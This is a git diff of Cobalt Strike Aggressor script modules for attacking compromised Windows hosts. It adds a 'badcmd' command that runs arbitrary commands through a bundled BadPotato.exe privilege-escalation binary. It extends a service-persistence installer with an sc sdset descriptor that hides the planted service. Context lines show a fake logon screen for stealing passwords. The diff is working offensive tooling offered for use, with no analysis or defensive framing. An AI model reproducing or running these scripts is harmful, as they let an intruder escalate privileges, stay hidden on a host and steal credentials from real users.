diff --git a/modules/commands.cna b/modules/commands.cna index a554341..957231e 100644 --- a/modules/commands.cna +++ b/modules/commands.cna @@ -57,4 +57,23 @@ alias logonscreen{ beacon_command_register( "logonscreen", "pop a fake logonscreen to steal password", - ""); \ No newline at end of file + ""); + +alias badcmd{ + if($2 eq ""){ + btask($1,"Usage: badcmd [command]"); + return; + } + $args = ""; + @args_list = sublist(@_, 1); + foreach $arg (@args_list){ + $args .= $arg . " "; + } + $cmd = "\"".replace($args, "\"", "\\\"")."\""; + bexecute_assembly($1, script_resource("post/BadPotato.exe"), $cmd); +} + +beacon_command_register( + "badcmd", + "execute command use badpotato", + "Usage: badcmd [command]"); \ No newline at end of file diff --git a/modules/gather.cna b/modules/gather.cna index e3e12ae..90d8ad2 100644 --- a/modules/gather.cna +++ b/modules/gather.cna @@ -101,37 +101,37 @@ sub main{ } } -sub audit{ - $bid = $1['@']; - $fname = beacon_info($bid,"computer")."-info.txt"; - $lpath = script_resource("temp\\ $+ $fname"); - $suggester = script_resource("local\\windows-exploit-suggester.py"); - $db = script_resource("local\\2020-04-10-mssb.xls"); - $audit_fname = script_resource("logs\\".beacon_info($bid,"computer")."-audit.txt"); - bshell($bid,"systeminfo > $+ $fname"); - bdownload($bid, $fname); - #sleep(3 * 1000); - foreach %item (downloads()){ - if (%item['name'] eq $fname){ - $rpath = %item['lpath']; - sync_download($rpath, $lpath); - } - } - #sleep(3 * 1000); - if (-exists $lpath){ - $cmd = $suggester." -i $+ $lpath -d $+ $db"; - $process = exec("cmd.exe /c ".$cmd); - @data = readAll($process); - $out = openf(">" . $audit_fname); - foreach $line (@data){ - writeb($out, $line."\r\n"); - } - closef($out); - closef($process); - deleteFile(replace($fname, "\\\\", "/")); - exec("cmd.exe /c start ".script_resource("logs\\")); - } - } +# sub audit{ +# $bid = $1['@']; +# $fname = beacon_info($bid,"computer")."-info.txt"; +# $lpath = script_resource("temp\\ $+ $fname"); +# $suggester = script_resource("local\\windows-exploit-suggester.py"); +# $db = script_resource("local\\2020-04-10-mssb.xls"); +# $audit_fname = script_resource("logs\\".beacon_info($bid,"computer")."-audit.txt"); +# bshell($bid,"systeminfo > $+ $fname"); +# bdownload($bid, $fname); +# #sleep(3 * 1000); +# foreach %item (downloads()){ +# if (%item['name'] eq $fname){ +# $rpath = %item['lpath']; +# sync_download($rpath, $lpath); +# } +# } +# #sleep(3 * 1000); +# if (-exists $lpath){ +# $cmd = $suggester." -i $+ $lpath -d $+ $db"; +# $process = exec("cmd.exe /c ".$cmd); +# @data = readAll($process); +# $out = openf(">" . $audit_fname); +# foreach $line (@data){ +# writeb($out, $line."\r\n"); +# } +# closef($out); +# closef($process); +# deleteFile(replace($fname, "\\\\", "/")); +# exec("cmd.exe /c start ".script_resource("logs\\")); +# } +# } #append menus @@ -144,7 +144,7 @@ sub audit{ dialog_description($dialog, "Collect information about the target host"); drow_checkbox($dialog, "sysinfo", "System informations", ""); drow_checkbox($dialog, "ipconfig", "Network card configuration information", ""); - drow_checkbox($dialog, "netstat", "Listening port list", ""); + drow_checkbox($dialog, "netstat", "Listening TCP port list", ""); drow_checkbox($dialog, "software", "Installed software list", ""); drow_checkbox($dialog, "ps_soft", "Installed software list(use powershell)", ""); drow_checkbox($dialog, "runprocs", "Startup processes list", ""); @@ -163,7 +163,7 @@ sub audit{ dialog_show($dialog); } - item "Audit available lpe vulnerability"{ - audit($1); - } + # item "Audit available lpe vulnerability"{ + # audit($1); + # } } \ No newline at end of file diff --git a/modules/persistence.cna b/modules/persistence.cna index e9fde24..cfb1520 100644 --- a/modules/persistence.cna +++ b/modules/persistence.cna @@ -46,10 +46,16 @@ sub InstallSchedule{ } sub InstallService{ - local('$Name $Path'); + local('$Name $Path $Hide_cmd'); $Name = $3['SerName']; $Path = replace($3['Path'], "\"", ""); - bshell($bid, "sc create \" $+ $Name\" binpath= \"cmd /c start \" $+ $Path\"\"&&sc config \" $+ $Name\" start= auto&&net start $+ $Name"); + $Hide_cmd = "sc sdset $+ $Name \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\""; + if ($3['Hide'] eq "true"){ + bshell!($bid, "sc create \" $+ $Name\" binPath= \" $+ $Path\" && sc config \" $+ $Name\" start= auto && $+ $Hide_cmd"); + } + else{ + bshell!($bid, "sc create \" $+ $Name\" binPath= \" $+ $Path\" && sc config \" $+ $Name\" start= auto"); + } } @@ -100,6 +106,7 @@ sub InstallService{ dialog_description($Dialog, "Register an executable file as a service"); drow_text($Dialog, "SerName", "Service Name: "); drow_text($Dialog, "Path", "Bin Path: "); + drow_checkbox($Dialog, "Hide", "Hide service: ", ""); dbutton_action($Dialog, "Install"); dialog_show($Dialog); } diff --git a/post/BadPotato.exe b/post/BadPotato.exe new file mode 100644 index 0000000..75c55aa Binary files /dev/null and b/post/BadPotato.exe differ